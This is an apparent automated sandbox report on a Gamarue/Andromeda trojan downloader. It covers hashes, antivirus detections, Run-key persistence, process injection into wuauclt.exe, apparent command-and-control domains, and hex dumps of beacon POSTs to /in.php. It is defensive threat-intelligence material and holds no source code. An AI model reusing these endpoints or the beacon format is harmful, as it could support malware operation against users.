Analysis Date: 2015-03-15 12:47:26
MD5: 1b227f86f8b28303a181367124aecd02
SHA1: 941a3c7747e7e85806e508fedb1572c4fb5ee622

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a9294eaa84de4d3d194cf55f16bb5d6d sha1: f15360803944ee4198f59bc859d3bc8cca20ea5d size: 7680
Section .rdata md5: 62f6a242d40de85d4211f98cb6059fae sha1: 87fd2c90d445df077109e7aae958fdb140392fa0 size: 512
Section .data md5: 270333eb361884b49d7773b18aa79988 sha1: a1d993ca88684b6acbddcd6bc5a610637a969c96 size: 512
Section .rsrc md5: 687a936f4ec298407bb87376bd821098 sha1: cabfffedb16131c955c989073d0f900954c2672b size: 173056
Timestamp: 2003-05-25 17:04:53
Version:
  LegalCopyright: Copyright Mamuze© 2013
  InternalName: Travka
  FileVersion: 1, 3, 4, 7
  CompanyName: House
  PrivateBuild: Rainbow
  LegalTrademarks: Fioka©"
  Comments: Praslin
  ProductName: Sunce
  SpecialBuild: Kotlina
  ProductVersion: 3, 0, 0, 0
  FileDescription: Marko
  OriginalFilename: Voda.exe
Packer: Borland Delphi 3.0 (???)
PEhash: 763958cdd6e6a0c1ac8a810840bfc92bdec641bc
IMPhash: 6d224858fdb04f5c605bc4a4a74b60cc
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.GenericKDZ.13938
AV Alwil (avast): Downloader-SYZ [Trj]
AV Arcabit (arcavir): Trojan.GenericKDZ.13938
AV Authentium: W32/Trojan.FFMJ-0154
AV Avira (antivir): BDS/Androm.EB.100
AV BullGuard: Trojan.GenericKDZ.13938
AV CA (E-Trust Ino): Win32/Gamarue.JK
AV CAT (quickheal): Worm.Gamarue.B
AV ClamAV: no_virus
AV Dr. Web: BackDoor.Andromeda.22
AV Emsisoft: Trojan.GenericKDZ.13938
AV Eset (nod32): Win32/TrojanDownloader.Wauchos.A
AV Fortinet: W32/Injector.AFHI!tr
AV Frisk (f-prot): W32/Trojan2.OCAH
AV F-Secure: Trojan.GenericKDZ.13938
AV Grisoft (avg): Downloader.Generic13.AOZD
AV Ikarus: Worm.Win32.Gamarue
AV K7: Trojan-Downloader ( 0040f30c1 )
AV Kaspersky 2015: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Zbot.HE
AV Mcafee: PWS-FAVD!1B227F86F8B2
AV Microsoft Security Essentials: VirTool:Win32/Obfuscator.AGC
AV MicroWorld (escan): Trojan.GenericKDZ.13938
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: TROJ_FORUCON.BMC
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Wauchos.2183

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\system32\wuauclt.exe

Process
↳ C:\WINDOWS\system32\wuauclt.exe

Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝
C:\Documents and Settings\All Users\Local Settings\Temp\msawoiifp.exe\\x00
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\All Users\Local Settings\Temp\msawoiifp.exe
Creates File: \Device\Afd\Endpoint
Deletes File: C:\941A3C~1.EXE
Creates Mutex: 3227095050

Network Details:

DNS www.update.microsoft.com.nsatc.net (A) ➝ 134.170.58.221
DNS www.update.microsoft.com.nsatc.net (A) ➝ 134.170.58.222
DNS xdqzpbcgrvkj.ru (A) ➝ 195.22.26.254
DNS xdqzpbcgrvkj.ru (A) ➝ 195.22.26.231
DNS xdqzpbcgrvkj.ru (A) ➝ 195.22.26.252
DNS xdqzpbcgrvkj.ru (A) ➝ 195.22.26.253
DNS anam0rph.su (A) ➝ 195.22.26.254
DNS anam0rph.su (A) ➝ 195.22.26.231
DNS anam0rph.su (A) ➝ 195.22.26.252
DNS anam0rph.su (A) ➝ 195.22.26.253
DNS orzdwjtvmein.in (A) ➝ 50.63.202.67
DNS ygiudewsqhct.in (A) ➝ 69.195.129.70
DNS somicrososoft.ru (A) ➝ 64.90.187.138
DNS www.update.microsoft.com (A)
DNS bdcrqgonzmwuehky.nl (A)
HTTP POST http://xdqzpbcgrvkj.ru/in.php (User-Agent: Mozilla/4.0)
HTTP POST http://anam0rph.su/in.php (User-Agent: Mozilla/4.0)
HTTP POST http://orzdwjtvmein.in/in.php (User-Agent: Mozilla/4.0)
HTTP POST http://ygiudewsqhct.in/in.php (User-Agent: Mozilla/4.0)
HTTP POST http://somicrososoft.ru/in.php (User-Agent: Mozilla/4.0)
Flows TCP 192.168.1.1:1031 ➝ 134.170.58.221:80
Flows UDP 192.168.1.1:1032 ➝ 8.8.4.4:53
Flows TCP 192.168.1.1:1033 ➝ 195.22.26.254:80
Flows UDP 192.168.1.1:1034 ➝ 8.8.4.4:53
Flows TCP 192.168.1.1:1035 ➝ 195.22.26.254:80
Flows UDP 192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP 192.168.1.1:1037 ➝ 50.63.202.67:80
Flows UDP 192.168.1.1:1038 ➝ 8.8.4.4:53
Flows TCP 192.168.1.1:1039 ➝ 69.195.129.70:80
Flows UDP 192.168.1.1:1040 ➝ 8.8.4.4:53
Flows UDP 192.168.1.1:1041 ➝ 8.8.4.4:53
Flows TCP 192.168.1.1:1042 ➝ 64.90.187.138:80

Raw Pcap
0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20786471   P/1.1..Host: xdq
0x00000020 (00032)   7a706263 6772766b 6a2e7275 0d0a5573   zpbcgrvkj.ru..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20616e61   P/1.1..Host: ana
0x00000020 (00032)   6d307270 682e7375 0d0a5573 65722d41   m0rph.su..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   300d0a43 6f6e7465 6e742d54 7970653a   0..Content-Type:
0x00000050 (00080)   20617070 6c696361 74696f6e 2f782d77    application/x-w
0x00000060 (00096)   77772d66 6f726d2d 75726c65 6e636f64   ww-form-urlencod
0x00000070 (00112)   65640d0a 436f6e74 656e742d 4c656e67   ed..Content-Leng
0x00000080 (00128)   74683a20 38340d0a 436f6e6e 65637469   th: 84..Connecti
0x00000090 (00144)   6f6e3a20 636c6f73 650d0a0d 0a757071   on: close....upq
0x000000a0 (00160)   63684373 38764654 4b464f56 6d6e494b   chCs8vFTKFOVmnIK
0x000000b0 (00176)   47497769 4c72486f 33567436 38543379   GIwiLrHo3Vt68T3y
0x000000c0 (00192)   71766851 75325471 6574516e 33714979   qvhQu2TqetQn3qIy
0x000000d0 (00208)   37513662 70546644 55745949 66745a33   7Q6bpTfDUtYIftZ3
0x000000e0 (00224)   334e4241 4f4c4173 67396d59 3371773d   3NBAOLAsg9mY3qw=
0x000000f0 (00240)   3d71773d 3d                           =qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 206f727a   P/1.1..Host: orz
0x00000020 (00032)   64776a74 766d6569 6e2e696e 0d0a5573   dwjtvmein.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20796769   P/1.1..Host: ygi
0x00000020 (00032)   75646577 73716863 742e696e 0d0a5573   udewsqhct.in..Us
0x00000030 (00048)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000040 (00064)   612f342e 300d0a43 6f6e7465 6e742d54   a/4.0..Content-T
0x00000050 (00080)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000060 (00096)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000070 (00112)   6e636f64 65640d0a 436f6e74 656e742d   ncoded..Content-
0x00000080 (00128)   4c656e67 74683a20 38340d0a 436f6e6e   Length: 84..Conn
0x00000090 (00144)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x000000a0 (00160)   0a757071 63684373 38764654 4b464f56   .upqchCs8vFTKFOV
0x000000b0 (00176)   6d6e494b 47497769 4c72486f 33567436   mnIKGIwiLrHo3Vt6
0x000000c0 (00192)   38543379 71766851 75325471 6574516e   8T3yqvhQu2TqetQn
0x000000d0 (00208)   33714979 37513662 70546644 55745949   3qIy7Q6bpTfDUtYI
0x000000e0 (00224)   66745a33 334e4241 4f4c4173 67396d59   ftZ33NBAOLAsg9mY
0x000000f0 (00240)   3371773d 3d                           3qw==

0x00000000 (00000)   504f5354 202f696e 2e706870 20485454   POST /in.php HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20736f6d   P/1.1..Host: som
0x00000020 (00032)   6963726f 736f736f 66742e72 750d0a55   icrososoft.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038340d 0a436f6e   -Length: 84..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 73387646 544b464f   ..upqchCs8vFTKFO
0x000000b0 (00176)   566d6e49 4b474977 694c7248 6f335674   VmnIKGIwiLrHo3Vt
0x000000c0 (00192)   36385433 79717668 51753254 71657451   68T3yqvhQu2TqetQ
0x000000d0 (00208)   6e337149 79375136 62705466 44557459   n3qIy7Q6bpTfDUtY
0x000000e0 (00224)   4966745a 33334e42 414f4c41 7367396d   IftZ33NBAOLAsg9m
0x000000f0 (00240)   59337177 3d3d                         Y3qw==


Strings
<.
040904b0
1, 3, 4, 7
 2013
3, 0, 0, 0
Comments
CompanyName
Copyright Mamuze
FileDescription
FileVersion
Fioka
House
InternalName
Kotlina
LegalCopyright
LegalTrademarks
Marko
OriginalFilename
Praslin
PrivateBuild
ProductName
ProductVersion
Rainbow
SpecialBuild
StringFileInfo
Sunce
Translation
Travka
VarFileInfo
Voda.exe
VS_VERSION_INFO
5XuL^k
##8vR^
AcJ@`GDaIG^GK\HS]J[OCaPDVD7=)
ADVAPI32.dll
<AS8<.=?6+
atpsUx{t
B/!bRGeUJeUJeUJeUJcSH\PGWMFULFSNKPONLNOIMPFOUCPZ?P\8M\CW`qnZ
bx}v{t^qytr
C0#eVKiZOhYOhYOhYO_SK<]t.`
C1$hYOl]Sk]Sk]Sk\R\TO/j
C4.M?9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9N@9F810 
CloseHandle
CreateThread
`cWiZQk]Sk]Sl]TeVLD2%/
D1&k\SoaWo`Wo`Wn_V\VS0k
D3'naXse\re\re\rd[]YW0p
@.data
Da)Ym4qs9
d}wp}s{tsT
E4)rd\viaviaviatg_][[0t
*&^ebQ"
Eb*Zp7yz>
eg\m^Uo`Wo`Wo`WoaXiZPA/"-
>]&?e+I
f#3b1C
FindResourceA
GetCurrentDirectoryA
GetCurrentProcessId
GetModuleHandleA
GetProcAddress
GetSystemInfo
gkwUg!X}
GlobalFree
GNy8=[+)H$
}HB7OA7PC8NA6E4&8"
,Hj8J-
_hzYm%\
I2 J4!J4!J4!J4!J3!J3!J3!J3!J3!J3!G1 Q9
}icYqd[re\re\re\re\sf]eVM9&
i#R 7X!>
(,I}y(yIc
j>j.jA
jL'JRz
jnpmhewkdymfxleyle{og|pi|qi|pi|pi|pi|pi|pi|pi|pi|pi|pi|pi|pi}qixldF6,G7-{pi
jWj%jQ
K5	C}.[
K=6wmh
kernel32.dll
KERNEL32.dll
_`\`k]mymmpgjg^kb[oc]tg`vjcwkdxldxleylexlexlexlexlexleymeth`F5+F6,xld}qi|pi|pi|og_ab4|
\K>_NA_M@_M@_M@_M@_N@_N@_N@_NA_NA_NA_N@_M@_M@_NAYI=dO5
 l}4R<Y
L6%M7&M7&M7&M7&M7&M7&M7&M7&M7&M7&J5$U>"
lgciinf
LoadLibraryA
LoadResource
lpsnkjrkgvkezng}rk
M5(3XMA
_NBbQEbQEbQEbQEbQEbQEaQDaPDaPCaOC`OB`OB_NA_NA^NAXI>gP4
nxmhi`ic[kaYnbZsf_uhaviaviaviaviaviard\E4)F5+th`ymexleylewkc\]^0x
O9)P;+P;+P;+P;+P;+P;+P;+P;+P;+P;*L8)X@%
	oC-nr
OH;WG;YI<ZH<[I=]K?\K=M:,8#
oopuol|rn
ov{qopslixni~sl
`P8]Cy
p{P{{~rT
[~psat
[~ps[xq
\^QgWMhYOiZPcSID1$0
QH:ZH;[I<\I<\I<TA3B-
{qlPB<,
Q=,S>.S>.S>.S>.S>.S>.S>.S>.S>.S>.O<-\D)
QVWj!j+j
QZ9':}
`.rdata
RegCloseKey
/RFEQPP
Rich[z
{RprwtT}
r;Ulz_1
RYwPc&\
SizeofResource
so.zX/
s{{=s{{
s~z3WlRz
T@1VB3VB3VB3VB3VB3VB3VB3VB3VB3VB3T@2VB.iO.kQ-zb3~h5
~{tBA=s{{
}t{BA=s{{
{tBAUx
tc~fxstRwp
tc~~{wt{
!This program cannot be run in DOS mode.
tmH8/G7.
tmjge?
tpsR~}
trxp{U~{st
{tUx{t]p|tfPA471PcdMIZyiGxmPA0PADO
tWp}s{t
{tWp}s{tP
un{piG7-H9/
Ux}sat
V#9[#@
V9fodm=
vQ/%.$
V{~qp{P{{~r
V{~qp{U
WaitForSingleObject
WD5YF8YF8YF8YF8YF8YF8YF8YF8YF8YF8XF8VD7TB5SB4RA4M=1[F-
wqD4+-
wrI91=-$~sm
wt{{BA=s{{
wT^e7$+3o
X$;^&C
(X Gg/fv=
x~}Ux{
}yj9jRj
ysyojS|
ytirxv
YYKdSHeUJ^NBC/!1
*Z&=a)F
ZH:\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=\J=WF:aL3
Z_z@R:1U.@d$b